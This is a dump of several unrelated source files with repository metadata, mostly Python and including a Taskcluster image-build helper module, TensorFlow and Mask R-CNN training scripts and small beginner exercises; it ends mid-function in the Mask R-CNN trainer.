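# the result holds the predictor value recorded 6 hours before ts[i], i.e. a
# 6-hour-lagged copy of the series; timestamps with no match become NaN.
lag_demo = pd.DataFrame({'date': (ts - pd.Timedelta(hours=6)).astype(str)})
merged_demo = pd.merge(pred_demo, lag_demo, on='date', how='right')
print(merged_demo.head())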
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|
dc6915253df8e0d8731f11cc979a0b8130edcaf3
|
ef5ecb62af83623b071b81b8d68eaac7fcce80cc
|
/beginner/question_1118.py
|
5f3f8d08cc8bc43d4bf3a6dfaeb71c2bae72825d
|
[] |
no_license
|
LuizHenrique1999/uri_online_judge
|
0e6d5f48c4ffd58902164ea9decf377b9df46283
|
937527ef0ebdff9756ab22bd95dbc03218a25144
|
refs/heads/main
| 2023-04-01T21:10:24.629839
| 2021-03-30T21:34:23
| 2021-03-30T21:34:23
| 352,787,507
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 694
|
py
|
def novo_calculo():
while True:
print('novo calculo (1-sim 2-nao)')
novo_calc = float(input())
if novo_calc == 1:
repete_operacao()
elif novo_calc == 2:
exit()
elif novo_calc != 1 and novo_calc != 2:
continue
def repete_operacao():
lista_repete = []
while True:
n = float(input())
if n >= 0 and n < 10.01:
lista_repete.append(n)
else:
print('nota invalida')
if len(lista_repete) == 2:
res = (lista_repete[0] + lista_repete[1]) / 2
print('media = %.2f' % res)
break
repete_operacao()
novo_calculo()
|
[
"luizdesenv01@outlook.com"
] |
luizdesenv01@outlook.com
|
a2769b3ae31b35c5712c041a8a7d129ddd2971da
|
ef67ea9b7f450a4317553882a28205194dcd5a86
|
/ci/cib.py
|
80d7ee0ca2c404968a3a8db1a091a88d4a81bdf1
|
[] |
no_license
|
tp-tc/cloud-image-builder
|
a19c62a24a22fe140a58f3f50d5e734163c6cc26
|
430465adc63f5a0a7f0eda2f6e8f73949c08b34e
|
refs/heads/master
| 2022-12-01T17:45:41.404866
| 2020-05-07T21:32:19
| 2020-05-07T21:32:19
| 262,164,488
| 0
| 0
| null | 2020-05-07T21:41:35
| 2020-05-07T21:41:35
| null |
UTF-8
|
Python
| false
| false
| 11,383
|
py
|
import gzip
import json
import os
import sys
import urllib.request
import yaml
from datetime import datetime, timedelta
from cachetools import cached, TTLCache
cache = TTLCache(maxsize=100, ttl=300)
@cached(cache)
def getConfig(revision, key):
url = 'https://raw.githubusercontent.com/mozilla-platform-ops/cloud-image-builder/{}/config/{}.yaml'.format(revision, key)
return yaml.safe_load(urllib.request.urlopen(url).read().decode())
def updateRole(auth, configPath, roleId):
with open(configPath, 'r') as stream:
payload = yaml.safe_load(stream)
role = None
try:
role = auth.role(roleId = roleId)
except:
print('TASKCLUSTER_ROOT_URL:', os.environ['TASKCLUSTER_ROOT_URL'])
print('error:', sys.exc_info()[0])
if role:
print('info: role {} existence detected'.format(roleId))
auth.updateRole(roleId, payload)
print('info: role {} updated'.format(roleId))
else:
print('info: role {} absence detected'.format(roleId))
auth.createRole(roleId, payload)
print('info: role {} created'.format(roleId))
def updateWorkerPool(workerManager, configPath, workerPoolId):
with open(configPath, 'r') as stream:
payload = yaml.safe_load(stream)
try:
workerManager.workerPool(workerPoolId = workerPoolId)
print('info: worker pool {} existence detected'.format(workerPoolId))
workerManager.updateWorkerPool(workerPoolId, payload)
print('info: worker pool {} updated'.format(workerPoolId))
except:
print('info: worker pool {} absence detected'.format(workerPoolId))
workerManager.createWorkerPool(workerPoolId, payload)
print('info: worker pool {} created'.format(workerPoolId))
def createTask(queue, taskId, taskName, taskDescription, provisioner, workerType, commands, env = None, image = None, priority = 'low', retries = 0, retriggerOnExitCodes = [], dependencies = [], maxRunMinutes = 10, features = {}, artifacts = [], osGroups = [], routes = [], scopes = [], taskGroupId = None):
payload = {
'created': '{}Z'.format(datetime.utcnow().isoformat()[:-3]),
'deadline': '{}Z'.format((datetime.utcnow() + timedelta(days = 3)).isoformat()[:-3]),
'dependencies': dependencies,
'provisionerId': provisioner,
'workerType': workerType,
'priority': priority,
'routes': routes,
'scopes': scopes,
'payload': {
'maxRunTime': (maxRunMinutes * 60),
'command': commands,
'artifacts': artifacts if workerType.startswith('win') else { artifact['name']: { 'type': artifact['type'], 'path': artifact['path'] } for artifact in artifacts },
'features': features
},
'metadata': {
'name': taskName,
'description': taskDescription,
'owner': 'grenade@mozilla.com',
'source': 'https://github.com/mozilla-platform-ops/cloud-image-builder'
},
'schedulerId': 'taskcluster-github'
}
if taskGroupId is not None:
payload['taskGroupId'] = taskGroupId
if env is not None:
payload['payload']['env'] = env
if image is not None:
payload['payload']['image'] = image
if osGroups:
payload['payload']['osGroups'] = osGroups
if retriggerOnExitCodes and retries > 0:
payload['retries'] = retries
payload['payload']['onExitStatus'] = {
'retry': retriggerOnExitCodes
}
queue.createTask(taskId, payload)
print('info: task {} ({}: {}), created with priority: {}'.format(taskId, taskName, taskDescription, priority))
def diskImageManifestHasChanged(platform, key, currentRevision):
try:
previousRevisionUrl = '{}/api/index/v1/task/project.relops.cloud-image-builder.{}.{}.latest/artifacts/public/image-bucket-resource.json'.format(os.environ['TASKCLUSTER_ROOT_URL'], platform, key)
previousRevision = json.loads(gzip.decompress(urllib.request.urlopen(previousRevisionUrl).read()).decode('utf-8-sig'))['build']['revision']
print('debug: previous revision determined as: {}, using: {}'.format(previousRevision, previousRevisionUrl))
currentConfig = getConfig(currentRevision, key)
print('debug: current config for: {}, loaded from revision: {}'.format(key, currentRevision[0:7]))
previousConfig = getConfig(previousRevision, key)
print('debug: previous config for: {}, loaded from revision: {}'.format(key, previousRevision[0:7]))
except:
print('error: failed to load comparable disk image configs for: {}'.format(key))
return True
imageConfigUnchanged = True
isoConfigUnchanged = True
sharedFilesUnchanged = True
if currentConfig['image'] == previousConfig['image']:
print('info: no change detected for image definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(key, previousRevision[0:7], currentRevision[0:7]))
else:
imageConfigUnchanged = False
print('info: change detected for image definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(key, previousRevision[0:7], currentRevision[0:7]))
if currentConfig['iso'] == previousConfig['iso']:
print('info: no change detected for iso definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(key, previousRevision[0:7], currentRevision[0:7]))
else:
isoConfigUnchanged = False
print('info: change detected for iso definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(key, previousRevision[0:7], currentRevision[0:7]))
# todo: parse shared config files for change specific to platform/key
for sharedFile in ['disable-windows-service', 'drivers', 'packages', 'unattend-commands']:
currentContents = urllib.request.urlopen('https://raw.githubusercontent.com/mozilla-platform-ops/cloud-image-builder/{}/config/{}.yaml'.format(currentRevision, sharedFile)).read().decode()
previousContents = urllib.request.urlopen('https://raw.githubusercontent.com/mozilla-platform-ops/cloud-image-builder/{}/config/{}.yaml'.format(previousRevision, sharedFile)).read().decode()
if currentContents == previousContents:
print('info: no change detected in {}.yaml between last image build in revision: {} and current revision: {}'.format(sharedFile, previousRevision[0:7], currentRevision[0:7]))
else:
sharedFilesUnchanged = False
print('info: change detected for {}.yaml between last image build in revision: {} and current revision: {}'.format(sharedFile, previousRevision[0:7], currentRevision[0:7]))
return not (imageConfigUnchanged and isoConfigUnchanged and sharedFilesUnchanged)
def machineImageManifestHasChanged(platform, key, currentRevision, group):
try:
previousRevisionUrl = '{}/api/index/v1/task/project.relops.cloud-image-builder.{}.{}.latest/artifacts/public/image-bucket-resource.json'.format(os.environ['TASKCLUSTER_ROOT_URL'], platform, key)
previousRevision = json.loads(gzip.decompress(urllib.request.urlopen(previousRevisionUrl).read()).decode('utf-8-sig'))['build']['revision']
print('debug: previous revision determined as: {}, using: {}'.format(previousRevision, previousRevisionUrl))
currentConfig = getConfig(currentRevision, key)
print('debug: current config for: {}, loaded from revision: {}'.format(key, currentRevision[0:7]))
previousConfig = getConfig(previousRevision, key)
print('debug: previous config for: {}, loaded from revision: {}'.format(key, previousRevision[0:7]))
except:
print('error: failed to load comparable disk image configs for: {}'.format(key))
return True
targetBootstrapUnchanged = True
targetTagsUnchanged = True
currentTargetGroupConfig = next((t for t in currentConfig['target'] if t['group'] == group), None)
previousTargetGroupConfig = next((t for t in previousConfig['target'] if t['group'] == group), None)
if previousTargetGroupConfig is None and currentTargetGroupConfig is not None:
print('info: new target group {} detected, in {}.yaml since last image build in revision: {} and current revision: {}'.format(group, key, previousRevision[0:7], currentRevision[0:7]))
return True
if 'bootstrap' in currentTargetGroupConfig and 'bootstrap' not in previousTargetGroupConfig:
targetBootstrapUnchanged = False
print('info: change detected in target group {}. new bootstrap execution commands definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(group, key, previousRevision[0:7], currentRevision[0:7]))
elif 'bootstrap' not in currentTargetGroupConfig and 'bootstrap' in previousTargetGroupConfig:
targetBootstrapUnchanged = False
print('info: change detected in target group {}. removed bootstrap execution commands definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(group, key, previousRevision[0:7], currentRevision[0:7]))
elif 'bootstrap' in currentTargetGroupConfig and 'bootstrap' in previousTargetGroupConfig and currentTargetGroupConfig['bootstrap'] != previousTargetGroupConfig['bootstrap']:
targetBootstrapUnchanged = False
print('info: change detected in target group {}, for bootstrap execution commands definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(group, key, previousRevision[0:7], currentRevision[0:7]))
else:
print('info: no change detected in target group {}, for bootstrap execution commands definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(group, key, previousRevision[0:7], currentRevision[0:7]))
for tagKey in ['workerType', 'sourceOrganisation', 'sourceRepository', 'sourceRevision', 'sourceScript', 'deploymentId']:
currentTagValue = next((tag for tag in currentTargetGroupConfig['tag'] if tag['name'] == tagKey), { 'value': '' })['value']
previousTagValue = next((tag for tag in previousTargetGroupConfig['tag'] if tag['name'] == tagKey), { 'value': '' })['value']
if currentTagValue == previousTagValue:
print('debug: no change detected for tag {}, with value "{}", in target group {}, in {}.yaml between last image build in revision: {} and current revision: {}'.format(tagKey, currentTagValue, group, key, previousRevision[0:7], currentRevision[0:7]))
else:
targetTagsUnchanged = False
print('info: change detected for tag {}, with previous value "{}", and new value "{}", in target group {}, in {}.yaml between last image build in revision: {} and current revision: {}'.format(tagKey, previousTagValue, currentTagValue, group, key, previousRevision[0:7], currentRevision[0:7]))
return not (targetBootstrapUnchanged and targetTagsUnchanged)
def machineImageExists(taskclusterIndex, platformClient, platform, group, key):
artifact = taskclusterIndex.findArtifactFromTask(
'project.relops.cloud-image-builder.{}.{}.latest'.format(platform, key.replace('-{}'.format(platform), '')),
'public/image-bucket-resource.json')
image = None
if platform == 'azure':
imageName = '{}-{}-{}'.format(group.replace('rg-', ''), key.replace('-{}'.format(platform), ''), artifact['build']['revision'][0:7])
try:
image = platformClient.images.get(group, imageName)
print('{} machine image: {} found with id: {}'.format(platform, imageName, image.id))
except:
image = None
print('{} machine image: {} not found'.format(platform, imageName))
#elif platform == 'amazon':
return image is not None
|
[
"rthijssen@gmail.com"
] |
rthijssen@gmail.com
|
7cd3ad3b9c2bd241d97911ad2747e505a813da0f
|
678c8ca14253ed854e5e45d2821ee2c9b39c3a6f
|
/venv/bin/isort-identify-imports
|
ec4dc8cf2f2912dc8d69b8b5a129757cd519b581
|
[] |
no_license
|
Wade-Philander/flask
|
386593bdffc3be2981b59edeb39c96dbbc398278
|
5ab7fcc4f3f2d1567b0fe4b0600dc96c2f1b01c0
|
refs/heads/main
| 2023-03-01T01:38:24.474212
| 2021-02-09T08:16:36
| 2021-02-09T08:16:36
| 337,100,242
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 266
|
#!/home/user/uber-ladies/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from isort.main import identify_imports_main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(identify_imports_main())
|
[
"wadephilander7@gmail.com"
] |
wadephilander7@gmail.com
|
|
ad8427a59154bcb1575bed1b77b319a6f99a58da
|
8b6eeff24db9fb119f7f543ae6163f766fb715e6
|
/train.py
|
516d2c06392454eec537670a1ca76f5c87545068
|
[] |
no_license
|
dalmouiee/comp9417
|
e1d003aee888a073ed3da46081206ee65ecaaf91
|
486498c06c25fc386458fff7e304f8809c0f7c2f
|
refs/heads/master
| 2022-01-31T10:13:07.306605
| 2019-08-08T02:56:14
| 2019-08-08T02:56:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,035
|
py
|
import math, random, os, sys, time, glob, cv2
import tensorflow as tf
import numpy as np
from sklearn.utils import shuffle
import matplotlib.pyplot as plt
from numpy import array
# Hyperparameters
batchSize = 16
imageSize = 64
numChannels = 3
categories = ['positive', 'negative']
def createPlaceholders():
x = tf.placeholder(tf.float32, shape=[None, imageSize, imageSize, numChannels], name='x')
y = tf.placeholder(tf.float32, shape=[None, len(categories)], name='y')
yClasses = tf.argmax(y, dimension=1)
return x, y, yClasses
# Network parameters
filter_size_conv1 = 3
num_filters_conv1 = 32
filter_size_conv2 = 3
num_filters_conv2 = 32
filter_size_conv3 = 3
num_filters_conv3 = 64
filter_size_conv4 = 3
num_filters_conv4 = 32
filter_size_conv5 = 3
num_filters_conv5 = 64
fc_layer_size = 128
def preprocessImages(trainingPath):
images = []
labels = []
img_names = []
print('Processing training images:------------------')
'''for bp in bodyParts:
print("----------------- Reading Body Part: " + bp)
patients = os.listdir(trainingPath + "/" + bp)'''
for fields in categories:
index = categories.index(fields)
print('Now going to read {} files (Index: {})'.format(fields, index))
path = os.path.join(trainingPath, fields, '*g')
files = glob.glob(path)
for fl in files:
image = cv2.imread(fl)
image = cv2.resize(image, (imageSize, imageSize),0,0, cv2.INTER_LINEAR)
image = image.astype(np.float32)
image = np.multiply(image, 1.0 / 255.0)
images.append(image)
label = np.zeros(len(categories))
label[index] = 1.0
labels.append(label)
flbase = os.path.basename(fl)
img_names.append(flbase)
images = np.array(images)
labels = np.array(labels)
img_names = np.array(img_names)
imagesList, labelsList, namesList = shuffle(images, labels, img_names)
return imagesList, labelsList, namesList
# Fix shuffling function for these
def makeTrainSet(images, labels, names, validationSize):
imagesList = images[validationSize:]
labelsList = labels[validationSize:]
namesList = names[validationSize:]
#imagesList, labelsList, namesList = shuffle(imagesList, labelsList, namesList)
return imagesList, labelsList, namesList
def makeValidationSet(images, labels, names, validationSize):
imagesList = images[:validationSize]
labelsList = labels[:validationSize]
namesList = names[:validationSize]
#imagesList, labelsList, namesList = shuffle(imagesList, labelsList, namesList)
return imagesList, labelsList, namesList
def getNewBatch(set, bound, booly):
xBatch = set[0]
yBatch = set[1]
newBound = bound + batchSize
if booly == 0:
booly = set[0]
else:
booly = set[1]
if newBound > len(booly):
newBound = newBound % len(set[0])
return (xBatch[bound:]), (yBatch[bound:])
else:
return xBatch[bound:newBound], yBatch[bound:newBound]
def updateBounds(trainingBound, trainingSet, validBound, validationSet):
if trainingBound > len(trainingSet[0]):
trainingBound = (trainingBound + batchSize) % len(trainingSet[0])
else:
trainingBound += batchSize
if validBound > len(validationSet[0]):
validBound = (validBound + batchSize) % len(validationSet[0])
else:
validBound += batchSize
return trainingBound, validBound
def fixClassLabel(className):
if "negative" in className:
className = "negative"
else:
className = "positive"
return className
# Convolutional neural network layer
def create_convolutional_layer(input, num_input_channels, conv_filter_size, num_filters):
weights = tf.Variable(tf.truncated_normal([conv_filter_size, conv_filter_size, num_input_channels, num_filters],
stddev=0.05))
biases = tf.Variable(tf.constant(0.05, shape=[num_filters]))
## Creating the convolutional layer
layer = tf.nn.conv2d(input=input, filter=weights, strides=[1, 1, 1, 1], padding='SAME')
layer += biases
## Max-pooling.
layer = tf.nn.max_pool(value=layer, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
## Relu: activation function
layer = tf.nn.relu(layer)
return layer
def create_flatten_layer(layer):
# Shape of the layer will be [batch_size img_size img_size num_channels]
# Get it from the previous layer.
layer_shape = layer.get_shape()
## Number of features will be img_height * img_width* num_channels.
num_features = layer_shape[1:4].num_elements()
## Flatten the layer so we shall have to reshape to num_features
layer = tf.reshape(layer, [-1, num_features])
return layer
# Fully-connected layer
def create_fc_layer(input,
num_inputs,
num_outputs,
use_relu=True):
# Define trainable weights and biases
weights = tf.Variable(tf.truncated_normal([num_inputs, num_outputs], stddev=0.05))
biases = tf.Variable(tf.constant(0.05, shape=[num_outputs]))
# Fully connected layer takes input x and produces wx+b.
layer = tf.matmul(input, weights) + biases
if use_relu:
layer = tf.nn.relu(layer)
return layer
def show_progress(session, epoch, feed_dict_train, feed_dict_validate, val_loss, accuracy,
merged, train_writer, test_writer, i):
msg = "Training Epoch {0} --- Training Accuracy: {1:>6.1%}, Validation Accuracy: {2:>6.1%}, Validation Loss: {3:.3f}"
summary_train, acc = session.run([merged, accuracy], feed_dict=feed_dict_train)
if math.isnan(acc):
return
train_writer.add_summary(summary_train, i)
summary_test, val_acc = session.run([merged, accuracy], feed_dict=feed_dict_validate)
if math.isnan(val_acc):
return
test_writer.add_summary(summary_test, i)
print(msg.format(epoch + 1, acc, val_acc, val_loss))
#val_acc = session.run(accuracy, feed_dict=feed_dict_validate)
def train(session, saver, trainingSet, validationSet, optimiser, cost, accuracy, merged, trainWriter,
testWriter, num_iteration, x, y):
total_iterations = 0
trainingBound = 0
validBound = 0
for i in range(total_iterations,
total_iterations + num_iteration):
# Get next batch in sets and assign them
x_batch, y_true_batch = getNewBatch(trainingSet, trainingBound, 0)
x_valid_batch, y_valid_batch = getNewBatch(validationSet, validBound, 1)
# make sure bounds dont overflow
trainingBound, validBound = updateBounds(trainingBound, trainingSet, validBound, validationSet)
# feed training and validation batchs
feed_dict_tr = {x: x_batch, y: y_true_batch}
feed_dict_val = {x: x_valid_batch, y: y_valid_batch}
# run training algo
session.run(optimiser, feed_dict=feed_dict_tr)
if i % 20 == 0:
val_loss = session.run(cost, feed_dict=feed_dict_val)
epoch = int(i/10)
show_progress(session, epoch, feed_dict_tr, feed_dict_val, val_loss,
accuracy, merged, trainWriter, testWriter, i)
saver.save(session, './modelCheckpoints/MURA-model')
total_iterations += num_iteration
def main():
# Path to training set: ("MURA-v1.1\train")
trainingPath = sys.argv[1]
# preprocess images by reading from directory using CV2
images, labels, img_names = preprocessImages(trainingPath)
# 10% of images for validation
validationSize = int(0.25*len(images))
# List holds
# 1) List of images
# 2) List of Labels
# 3) List of Image names
# in order for each image processed
trainingSet = makeTrainSet(images, labels, img_names, validationSize) #['images','labels','imgnames']
validationSet = makeValidationSet(images, labels, img_names, validationSize) #['images','labels','imgnames']
#data = dataset.read_train_sets(train_path, img_size)
print("Number of files in Training-set:\t\t{}".format(len(trainingSet[1])))
print("Number of files in Validation-set:\t{}".format(len(validationSet[1])))
x, y, yClasses = createPlaceholders()
layer_conv1 = create_convolutional_layer(input=x,
num_input_channels=numChannels,
conv_filter_size=filter_size_conv1,
num_filters=num_filters_conv1)
layer_conv2 = create_convolutional_layer(input=layer_conv1,
num_input_channels=num_filters_conv1,
conv_filter_size=filter_size_conv2,
num_filters=num_filters_conv2)
layer_conv3= create_convolutional_layer(input=layer_conv2,
num_input_channels=num_filters_conv2,
conv_filter_size=filter_size_conv3,
num_filters=num_filters_conv3)
layer_flat = create_flatten_layer(layer_conv3)
layer_fc1 = create_fc_layer(input=layer_flat,
num_inputs=layer_flat.get_shape()[1:4].num_elements(),
num_outputs=fc_layer_size,
use_relu=True)
layer_fc2 = create_fc_layer(input=layer_fc1,
num_inputs=fc_layer_size,
num_outputs=len(categories),
use_relu=False)
y_pred = tf.compat.v1.nn.softmax(layer_fc2,name='y_pred')
y_pred_cls = tf.compat.v1.argmax(y_pred, dimension=1)
session = tf.Session()
session.run(tf.global_variables_initializer())
crossEntropy = tf.nn.softmax_cross_entropy_with_logits_v2(logits=layer_fc2, labels=y)
cost = tf.reduce_mean(crossEntropy)
tf.summary.scalar('cost',cost)
optimiser = tf.compat.v1.train.AdamOptimizer(learning_rate=1e-4).minimize(cost)
correctPrediction = tf.equal(y_pred_cls, yClasses)
accuracy = tf.reduce_mean(tf.cast(correctPrediction, tf.float32))
tf.summary.scalar('accuracy',accuracy)
merged = tf.compat.v1.summary.merge_all()
trainWriter = tf.compat.v1.summary.FileWriter('summary/train', session.graph)
testWriter = tf.compat.v1.summary.FileWriter('summary/test')
session.run(tf.global_variables_initializer())
saver = tf.compat.v1.train.Saver()
# 4000 magic number best performance on my pc, but on different devices this number changes...
train(session, saver, trainingSet, validationSet, optimiser, cost, accuracy, merged,
trainWriter, testWriter , 4000, x, y)
# Following 2 methods from the tutorial:
# https://medium.com/@awjuliani/visualizing-neural-network-layer-activation-tensorflow-tutorial-d45f8bf7bbc4
def getActivations(layer,stimuli):
units = session.run(layer,feed_dict={x:array(stimuli).reshape(1, imageSize,imageSize,numChannels)})
plotNNFilter(units)
def plotNNFilter(units):
filters = units.shape[3]
plt.figure(1, figsize=(20,20))
n_columns = 6
n_rows = math.ceil(filters / n_columns) + 1
for i in range(filters):
plt.subplot(n_rows, n_columns, i+1)
plt.title('Filter ' + str(i))
plt.imshow(units[0,:,:,i], interpolation="nearest", cmap="gray")
plt.show()
imageToUse = trainingSet[0][0]
plt.imshow(imageToUse, interpolation="nearest", cmap="gray")
plt.show()
getActivations(layer_conv3,imageToUse)
############################
# START OF PROGRAM
main()
|
[
"d.almouiee@gmail.com"
] |
d.almouiee@gmail.com
|
07b55d4c6d747ab587d2a653c986f6dcf3e7ad63
|
a25049ab1d4fa9fb1fcce26d075060ad15ec0a21
|
/MovingBall.pyde
|
e4793e35fb71e00cad2b7044f362fa6617b04382
|
[] |
no_license
|
ABahASC/Alpha_ASC3
|
a5fd1e8a27c36df44fe5b00f3fb9c3a6b6a92f0e
|
226264877a800b7f11a99bdd0bd732b934aa727d
|
refs/heads/master
| 2020-03-28T01:04:30.195960
| 2016-08-02T18:18:45
| 2016-08-02T18:18:45
| 63,184,210
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 315
|
pyde
|
x=200;
y=1;
speed = 1
def setup():
size (400,400);
smooth();
background(0);
noStroke();
fill(0,255,0);
def draw():
global x
global y
global speed
background(0);
rect(mouseX,330,40,40)
ellipse(x, 200, 40, 40);
x=x+y;
if (x>width-20 or x<20):
y=-y;
|
[
"alphabah212@gmail.com"
] |
alphabah212@gmail.com
|
8e685c4e4ad274a232060c4f31069754801a1c1f
|
88e7541b98a3b0d04b530438e88f875ae495e5d2
|
/dasgal8.py
|
36a8243b90da306a79bd10dc7f0dc1ece96d4aa7
|
[] |
no_license
|
ganbatz/phyton3
|
b8431ab0097ed97b1de04dc0a6db4c3736cc026b
|
8b6add2a25a28f34026d3ddb63772f5c3d756559
|
refs/heads/master
| 2022-06-24T09:28:40.868184
| 2020-05-09T17:41:07
| 2020-05-09T17:41:07
| 262,625,242
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 174
|
py
|
# Find the smallest of the three numbers
n1 = int(input())
n2 = int(input())
n3 = int(input())
if n1 <= n2 and n1 <= n3:
    print(n1)
elif n2 <= n3:
    print(n2)
else:
print(n3)
|
[
"noreply@github.com"
] |
noreply@github.com
|
541499ca55be3f2e1263c133d3499ab8864a3f6e
|
0649c9b00358dd7b3ca418f7ce15ff88507ed6b3
|
/storage_data.py
|
bbaf647ccba897a5ed812da12c2ddb2007fc1b50
|
[] |
no_license
|
Aaron9477/sky_lake
|
9c9b7904dbd3e36a366508aa0d3beccedd7355d9
|
baaba25bc72c81cf0868136a623036529eb9a840
|
refs/heads/master
| 2021-08-08T00:02:03.903907
| 2017-11-09T06:54:31
| 2017-11-09T06:54:31
| 109,121,106
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 100
|
py
|
import src.utils as u
if __name__ == '__main__':
for m in u.get_malls():
u.get_data(m)
|
[
"869788668@qq.com"
] |
869788668@qq.com
|
8c203afbdbef4e2245e6299014638e4b27f91d43
|
778548a8609bfcf098e6681c5bbab34152b694bb
|
/models/object_detection/pytorch/maskrcnn/maskrcnn-benchmark/maskrcnn_benchmark/engine/trainer.py
|
050f70a5859206f737c74c7debc3a31e072cd994
|
[
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
rahulunair/models
|
695a0077430820e449437399355107eb999fe2e3
|
75171f0271807944857ece42589b378469017f1e
|
refs/heads/master
| 2023-04-08T04:22:13.359790
| 2022-07-14T20:03:02
| 2022-07-14T20:03:02
| 178,485,628
| 0
| 0
|
Apache-2.0
| 2020-01-09T16:45:11
| 2019-03-29T23:00:22
|
Python
|
UTF-8
|
Python
| false
| false
| 8,610
|
py
|
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import datetime
import logging
import os
import time
import torch
import torch.distributed as dist
from tqdm import tqdm
from maskrcnn_benchmark.data import make_data_loader
from maskrcnn_benchmark.utils.comm import get_world_size, synchronize
from maskrcnn_benchmark.utils.metric_logger import MetricLogger
from maskrcnn_benchmark.engine.inference import inference
from ..utils.timer import Timer, get_time_str
import intel_extension_for_pytorch as ipex
def reduce_loss_dict(loss_dict):
"""
Reduce the loss dictionary from all processes so that process with rank
0 has the averaged results. Returns a dict with the same fields as
loss_dict, after reduction.
"""
world_size = get_world_size()
if world_size < 2:
return loss_dict
with torch.no_grad():
loss_names = []
all_losses = []
for k in sorted(loss_dict.keys()):
loss_names.append(k)
all_losses.append(loss_dict[k])
all_losses = torch.stack(all_losses, dim=0)
dist.reduce(all_losses, dst=0)
if dist.get_rank() == 0:
# only main process gets accumulated, so only divide by
# world_size in this case
all_losses /= world_size
reduced_losses = {k: v for k, v in zip(loss_names, all_losses)}
return reduced_losses
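# Illustrative note (added): with world_size == 2 and loss_dict = {"loss_cls": a, "loss_box": b},
# rank 0 receives {"loss_cls": (a0 + a1) / 2, "loss_box": (b0 + b1) / 2}; the dicts returned on
# the other ranks are not meaningful, as the docstring above states. With a single process the
# input dict is returned unchanged.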
def do_train(
cfg,
model,
data_loader,
data_loader_val,
optimizer,
scheduler,
checkpointer,
device,
checkpoint_period,
test_period,
arguments,
bf16=False,
iterations=-1,
iter_warmup=-1
):
logger = logging.getLogger("maskrcnn_benchmark.trainer")
logger.info("Start training")
meters = MetricLogger(delimiter=" ")
max_iter = len(data_loader)
start_iter = arguments["iteration"]
model.train()
training_timer = Timer()
start_training_time = time.time()
end = time.time()
iou_types = ("bbox",)
if cfg.MODEL.MASK_ON:
iou_types = iou_types + ("segm",)
if cfg.MODEL.KEYPOINT_ON:
iou_types = iou_types + ("keypoints",)
dataset_names = cfg.DATASETS.TEST
model, optimizer = ipex.optimize(model, dtype=torch.bfloat16 if bf16 else torch.float, optimizer=optimizer, inplace=True)
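    # (Added note) ipex.optimize prepares the model and optimizer for the IPEX CPU path;
    # combined with torch.cpu.amp.autocast and the channels_last inputs below, this enables
    # bf16 mixed-precision training when bf16=True.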
for iteration, (images, targets, _) in enumerate(data_loader, start_iter):
if any(len(target) < 1 for target in targets):
logger.error(f"Iteration={iteration + 1} || Image Ids used for training {_} || targets Length={[len(target) for target in targets]}" )
continue
data_time = time.time() - end
iteration = iteration + 1
arguments["iteration"] = iteration
images = images.to(device)
targets = [target.to(device) for target in targets]
if iteration > iter_warmup:
training_timer.tic()
with torch.cpu.amp.autocast(enabled=bf16):
loss_dict = model(images.to(memory_format=torch.channels_last), targets)
losses = sum(loss.to(torch.float32) for loss in loss_dict.values())
# reduce losses over all GPUs for logging purposes
loss_dict_reduced = reduce_loss_dict(loss_dict)
losses_reduced = sum(loss for loss in loss_dict_reduced.values())
meters.update(loss=losses_reduced, **loss_dict_reduced)
optimizer.zero_grad()
losses.backward()
optimizer.step()
scheduler.step()
if iteration > iter_warmup:
training_timer.toc()
batch_time = time.time() - end
end = time.time()
meters.update(time=batch_time, data=data_time)
eta_seconds = meters.time.global_avg * (max_iter - iteration)
eta_string = str(datetime.timedelta(seconds=int(eta_seconds)))
if iteration % 1 == 0 or iteration == max_iter:
logger.info(
meters.delimiter.join(
[
"eta: {eta}",
"iter: {iter}",
"{meters}",
"lr: {lr:.6f}",
"max mem: {memory:.0f}",
]
).format(
eta=eta_string,
iter=iteration,
meters=str(meters),
lr=optimizer.param_groups[0]["lr"],
memory=torch.cuda.max_memory_allocated() / 1024.0 / 1024.0,
)
)
if iteration % checkpoint_period == 0:
checkpointer.save("model_{:07d}".format(iteration), **arguments)
if data_loader_val is not None and test_period > 0 and iteration % test_period == 0:
meters_val = MetricLogger(delimiter=" ")
synchronize()
            _ = inference(  # The result can be used for additional logging, e.g. for TensorBoard
model,
# The method changes the segmentation mask format in a data loader,
# so every time a new data loader is created:
make_data_loader(cfg, is_train=False, is_distributed=(get_world_size() > 1), is_for_period=True),
dataset_name="[Validation]",
iou_types=iou_types,
box_only=False if cfg.MODEL.RETINANET_ON else cfg.MODEL.RPN_ONLY,
device=cfg.MODEL.DEVICE,
expected_results=cfg.TEST.EXPECTED_RESULTS,
expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,
output_folder=None,
)
synchronize()
model.train()
with torch.no_grad():
# Should be one image for each GPU:
for iteration_val, (images_val, targets_val, _) in enumerate(tqdm(data_loader_val)):
images_val = images_val.to(device)
